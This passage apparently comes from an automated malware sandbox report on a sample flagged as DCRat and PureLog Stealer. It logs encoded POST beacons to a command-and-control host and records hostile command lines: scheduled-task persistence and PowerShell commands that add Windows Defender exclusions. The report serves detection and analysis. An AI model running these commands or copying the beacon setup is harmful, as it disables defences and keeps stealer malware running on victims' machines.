Jan 6, 2025 10:33:19.510318995 CET	344	OUT	Data Raw: 05 05 04 00 06 0a 01 0b 05 06 02 01 02 03 01 05 00 0a 05 0f 02 0d 03 0e 07 05 0e 06 06 01 01 03 0f 0e 05 09 01 03 04 56 0f 0b 07 01 07 05 04 01 06 53 0f 00 0a 0f 04 0a 01 05 05 04 04 55 05 58 00 01 0f 0e 05 00 07 09 0e 03 0c 02 0c 03 0c 06 04 03 Data Ascii: VSUX\\L~~pr`b}OvvkUhRa`B]\`\|xsH{cy^kCZtYZAiO~V@{S\bi
Jan 6, 2025 10:33:19.822838068 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:33:19.955363989 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:33:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.4	49992	185.158.202.52	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:33:41.348767042 CET	303	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 6, 2025 10:33:41.697745085 CET	344	OUT	Data Raw: 00 0a 04 01 03 0c 04 07 05 06 02 01 02 06 01 00 00 02 05 0f 02 02 03 0e 02 06 0e 0c 04 55 01 57 0e 03 04 09 03 0d 04 56 0f 00 07 0a 07 01 06 04 05 03 0b 08 0c 07 01 0b 05 04 03 04 07 0a 07 5b 03 01 0e 0e 06 01 06 06 0f 02 0e 07 0c 07 0e 56 04 0c Data Ascii: UWV[V^\L~CceZt\mOvup~lyt\|c\hM{XxolZ{^aY\|ThvgZ}u~V@BxCr~\i
Jan 6, 2025 10:33:42.010540009 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:33:42.142652988 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:33:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	50011	185.158.202.52	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:33:50.668339014 CET	267	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 6, 2025 10:33:51.026005983 CET	344	OUT	Data Raw: 05 00 04 07 06 0f 04 05 05 06 02 01 02 0d 01 02 00 06 05 01 02 00 03 0b 02 0e 0c 54 04 07 01 05 0e 05 06 0a 02 01 07 06 0c 54 07 50 06 0a 07 0e 07 05 0e 0f 0f 0e 04 07 05 01 03 04 07 05 04 58 01 02 0f 09 07 01 06 07 0d 0e 0c 54 0f 53 0d 03 06 05 Data Ascii: TTPXTSVUR\L}Qk`TcaiaeUR\|Uetw_\|``Il\|oxYbh~`tIkZ~e~V@xmb~r}
Jan 6, 2025 10:33:51.324202061 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:33:51.457631111 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:33:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	50012	185.158.202.52	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:33:53.795926094 CET	320	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 6, 2025 10:33:54.151110888 CET	344	OUT	Data Raw: 05 05 04 04 03 08 01 05 05 06 02 01 02 00 01 05 00 06 05 09 02 05 03 00 00 01 0d 01 04 50 01 54 0f 51 06 59 00 0d 06 05 0f 00 07 07 07 03 05 0e 05 0a 0c 5e 0c 03 05 52 01 05 04 00 05 00 00 0e 05 02 0e 09 04 03 07 01 0e 07 0e 03 0d 51 0c 08 07 06 Data Ascii: PTQY^RQ\L}Rsvcqawu]S~}vllkcR{Rsxcu[hS``IRLe~V@{SbN}bW
Jan 6, 2025 10:33:54.432619095 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:33:54.566454887 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:33:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	50013	185.158.202.52	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:33:59.156932116 CET	303	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 6, 2025 10:33:59.510288000 CET	344	OUT	Data Raw: 05 05 04 00 06 0a 01 0b 05 06 02 01 02 03 01 05 00 0a 05 0f 02 0d 03 0e 07 05 0e 06 06 01 01 03 0f 0e 05 09 01 03 04 56 0f 0b 07 01 07 05 04 01 06 53 0f 00 0a 0f 04 0a 01 05 05 04 04 55 05 58 00 01 0f 0e 05 00 07 09 0e 03 0c 02 0c 03 0c 06 04 03 Data Ascii: VSUX\\L~~pr`b}OvvkUhRa`B]\`\|xsH{cy^kCZtYZAiO~V@{S\bi
Jan 6, 2025 10:33:59.812834024 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:33:59.945585966 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:33:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	50014	185.158.202.52	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:34:02.974296093 CET	320	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 6, 2025 10:34:03.322859049 CET	344	OUT	Data Raw: 00 00 04 0d 03 08 04 00 05 06 02 01 02 01 01 06 00 00 05 00 02 07 03 0f 02 04 0f 57 06 50 02 05 0c 02 03 0e 00 03 03 00 0d 06 06 03 00 03 07 0f 03 0a 0d 00 0a 0e 01 0a 05 0e 06 01 05 02 05 0b 01 03 0e 59 07 00 04 04 0b 07 0e 57 0c 54 0f 01 02 03 Data Ascii: WPYWTQ\L~sjcqr_vuQTUyLtRppoUoH{piY\|}wPwtt}O~V@{mz}LS
Jan 6, 2025 10:34:03.608345032 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:34:03.737171888 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:34:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	50015	185.158.202.52	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:34:26.291866064 CET	303	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 6, 2025 10:34:26.651206970 CET	344	OUT	Data Raw: 00 0a 04 01 03 0c 04 07 05 06 02 01 02 06 01 00 00 02 05 0f 02 02 03 0e 02 06 0e 0c 04 55 01 57 0e 03 04 09 03 0d 04 56 0f 00 07 0a 07 01 06 04 05 03 0b 08 0c 07 01 0b 05 04 03 04 07 0a 07 5b 03 01 0e 0e 06 01 06 06 0f 02 0e 07 0c 07 0e 56 04 0c Data Ascii: UWV[V^\L~CceZt\mOvup~lyt\|c\hM{XxolZ{^aY\|ThvgZ}u~V@BxCr~\i
Jan 6, 2025 10:34:26.930805922 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:34:27.061758041 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:34:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	50016	185.158.202.52	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:34:37.414577961 CET	303	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 6, 2025 10:34:37.760387897 CET	344	OUT	Data Raw: 05 05 04 04 03 0d 04 05 05 06 02 01 02 07 01 04 00 05 05 09 02 06 03 0d 02 53 0d 00 05 0f 03 04 0f 56 07 09 01 07 05 52 0b 0b 07 57 00 0a 04 56 06 0b 0b 0d 0d 00 04 0a 04 50 04 00 01 01 00 0d 01 01 0a 08 07 05 06 54 0e 04 0b 01 0c 0c 0e 02 07 50 Data Ascii: SVRWVPTP\L}S\|Ye_tqbYuuRk\|\Xvs\chxl`[lN~k``pNi_~V@A{CnN}\e
Jan 6, 2025 10:34:38.071033001 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:34:38.201706886 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:34:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	50017	185.158.202.52	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:34:44.435009003 CET	255	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 6, 2025 10:34:44.791646957 CET	344	OUT	Data Raw: 05 00 04 01 06 00 01 02 05 06 02 01 02 01 01 04 00 02 05 0b 02 04 03 01 01 05 0e 07 05 0f 03 53 0f 04 04 5e 00 0d 03 03 0f 53 06 53 06 00 07 0f 05 03 0d 0a 0d 0e 05 04 04 03 04 00 01 0a 05 0f 05 05 0e 09 07 02 06 09 0c 00 0c 54 0a 02 0d 09 05 03 Data Ascii: S^SSTRS\L}QkcvOtrabuoPkRSw\|ZhcZKylxYo`q_\|CRNwwtOj_~V@{CrL}r[
Jan 6, 2025 10:34:45.072540998 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:34:45.201836109 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:34:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Target ID:	0
Start time:	04:32:03
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\0J5DzstGPi.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\0J5DzstGPi.exe"
Imagebase:	0x990000
File size:	1'958'912 bytes
MD5 hash:	FECAFE9A80257E221C47577E704498F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1845656712.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1724618410.0000000000992000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:32:06
Start date:	06/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline"
Imagebase:	0x7ff69a680000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:32:06
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:32:06
Start date:	06/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8C8.tmp" "c:\Windows\System32\CSC7B104E16ED56415BA0A4E98DBA784BC.TMP"
Imagebase:	0x7ff7a6480000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:32:07
Start date:	06/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "steBCuuQsIefcKufvgYbRBCxKhPRs" /sc MINUTE /mo 6 /tr "'C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	04:32:07
Start date:	06/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "0J5DzstGPi0" /sc MINUTE /mo 12 /tr "'C:\Users\user\Desktop\0J5DzstGPi.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	04:32:07
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	04:32:07
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\steBCuuQsIefcKufvgYbRBCxKhPR.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	04:32:07
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	04:32:07
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\sihost.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	04:32:07
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	04:32:07
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	04:32:07
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
